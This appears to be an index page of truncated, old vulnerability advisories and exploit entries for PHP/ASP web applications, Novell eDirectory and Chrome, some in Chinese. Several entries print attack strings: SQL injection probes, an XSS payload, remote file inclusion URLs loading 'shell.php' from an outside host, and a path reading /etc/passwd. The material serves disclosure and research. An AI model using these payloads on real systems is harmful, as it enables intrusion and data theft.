PHP Classifieds ADS Blind SQL Injection

Title: PHP CLASSIFIEDS ADS Price: $49 Link : http://www.sellatsite.com/sellatsite/phpclass.asp Author: BorN To K!LL - h4ck3r 3xploit: /detail.php?sid=Blind-Injection 3xample: http://www.example.com/classi/detail.php?sid=80 and 1=1-- // True ,, http://www.example.com/classi/detail.php?sid=80 and...

Trouble Ticket Software - ttx.cgi Arbitrary File Download

Trouble Ticket Software - ttx.cgi Arbitrary File Download Exploit Title: Trouble Ticket Software 0Day Date: 3/12/2010 Author: n01d Software Link: http://www.troubleticketexpress.com Version: TTX v3.0.640 Tested on: =3.0.640 / \ / | | | | ' \ | | | || | / | | | | || || || || | | || || / || ,| Bob...

Illogator Shop SQL Injection Bypass

No description provided by source. Title: Illogator Shop SQL Injection Bypass Date: 11/12/2009 Author: bi0 CVE : /\ == \ /\ \ /\ \ \ \ \ \ \ \ \ /\ \ \ \ \ \ \ \ // // // ---------------------------------------------------------------- x Illogator Shop SQL Injection Bypass x Author : bi0 x...

Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting

https://www.example.com:8030/dhost/modules?I:dconserv.dlm=%3CSCRIPT%3Ealert%22Protek%20Research%20Lab's%22;%3C/SCRIPT%3E...

Novell eDirectory 8.8 SP5 'dconserv.dlm' Cross-Site Scripting

No description provided by source. https://www.example.com:8030/dhost/modules?I:dconserv.dlm=%3CSCRIPT%3Ealert%22Protek%20Research%20Lab's%22;%3C/SCRIPT%3E...

StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/44238/info StandAloneArcade is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the...

Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

No description provided by source. Author: nerex E-mail: nerexatlivedotcom Google's new Web browser Chrome allows files e.g., executables to be automatically downloaded to the user's computer without any user prompt. This proof-of-concept was created for educational purposes only. Use the code it...

Comdev Web Blogger 'arcmonth' SQL注入漏洞

BUGTRAQ ID: 30237 CNCAN ID：CNCAN-2008071601 Comdev Web Blogger是一款基于PHP的WEB应用程序。 Comdev Web Blogger不正确处理用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，可能获得敏感信息或操作数据库。 问题由于脚本对用户提交给'arcmonth'参数缺少过滤，构建恶意SQL查询作为参数数据，可更改原来的SQL逻辑，获得敏感信息或操作数据库。 Comdev Web Blogger 4.1.3 目前没有解决方案提供： http://www.comdevweb.com/blogger.php...

V-Webmail 1.6.4 - includescachedConfig.php?CONFIG[pear_dir] Remote File Inclusion

V-Webmail 1.6.4 - includescachedConfig.php?CONFIGpeardir Remote File Inclusion source: https://www.securityfocus.com/bid/30162/info V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues can allow an...

vBulletin redirect参数跨站脚本漏洞

BUGTRAQ ID: 29704 vBulletin是一款开放源代码PHP论坛程序。 vBulletin管理控制面板（ACP）的登录页面没有正确地验证redirect参数，远程攻击者可以通过向论坛提交使用data: URI主题Base64编码的登录请求执行跨站脚本攻击。 VBulletin VBulletin 3.7.1 VBulletin VBulletin 3.6.10 VBulletin --------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.vbulletin.com/...

GROUP-E 'head_auth.php'远程文件包含漏洞

BUGTRAQ ID: 28024 CNCAN ID:CNCAN-2008022903 GROUP-E是一款基于PHP的WEB应用程序。 GROUP-E不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB权限执行任意PHP代码。 问题是由于'headauth.php'脚本对用户提交的'CFGPREPENDFILE'参数处理缺少充分过滤，提交远程服务器的任意文件作为包含对象，可导致以WEB权限执行任意PHP代码。 GROUP-E GROUP-E 1.6.41 目前没有详细解决方案提供： http://www.group-e.info/...

contactforms-rfi.txt

Discovery by: Sw33t h4cK3r ----------- Exploit : http://Example.com/contactforms/cforms-css.php?tm=http://site.com/shell.php...

contactforms "cforms-css.php" Remote File Inclusion

Discovery by: Sw33t h4cK3r ----------- Exploit : http://Example.com/contactforms/cforms-css.php?tm=http://site.com/shell.php...

vbmarketing-lfi.txt

: Discovery by: Sw33t h4cK3r : POWERED BY: VB Marketing ----------- Exploit : http://Example.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00...

Agares Media ThemeSiteScript 1.0 - loadadminpage Remote File Inclusion

Agares Media ThemeSiteScript 1.0 - loadadminpage Remote File Inclusion source: https://www.securityfocus.com/bid/26998/info ThemeSiteScript is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to...

FairSoft S.Mini web Busines Prelease & Calendar asp Sql injection

thnx bro FairSoft S.Mini web Busines Prelease Calendar asp Sql injection include patch...ocf,ns ocf/Calendar/ViewEvent.asp,ns/Calendar/ViewEvent.asp,aboutus/newsroom/ViewPressRelease.asp Credit : CodeXpLoder'tq Mail : codexploderathotmaildotcom Site : codexploder.biyosecurity.net,biyofrm.com Sour...

Sige Sige_Init.PHP远程文件包含漏洞

Sige是一款基于PHP的WEB应用程序。 Sige不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB权限执行任意PHP代码。 问题是由于'SigeInit.PHP'脚本对用户提交的'SYSPATH'参数缺少过滤，指定远程服务器上的任意文件作为包含参数，可导致以WEB权限执行任意PHP代码。 Sige 0.1 目前没有详细解决方案提供： http://sourceforge.net/projects/pfadmin http://www.example.com/inc/sigeinit.php?SYSPATH=http://example2.com/scripts/020.t...

myphotographer image shop script /events/index.asp sql injection

myphotographer image shop script /events/index.asp sql injection Credit : CodeXpLoder'tq mail : codexploderathotmaildotcom site : Biyosecurity.net,expw0rm.com thx : BiyoSecurityTeam,Liz0ziM,eno7,3APA3A Sourge site : http://www.myphotographer.com/support/ 1-...

Web News 1.1 - 'news.php?config[root_ordner]' Remote File Inclusion

source: https://www.securityfocus.com/bid/25257/info WebNews is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks...

SYSTONÝCfr/portal/ actualites.asp sql injection

SYSTONЭCfr/portal/ actualites.asp sql injection Credit : CodeXpLoder'tq mail : codexploderathotmaildotcom site : Biyosecurity.net,expw0rm.com thx : BiyoSecurityTeam spec.note : "Live The Life" ///////////////////////////////////////////////////////////////// 1-...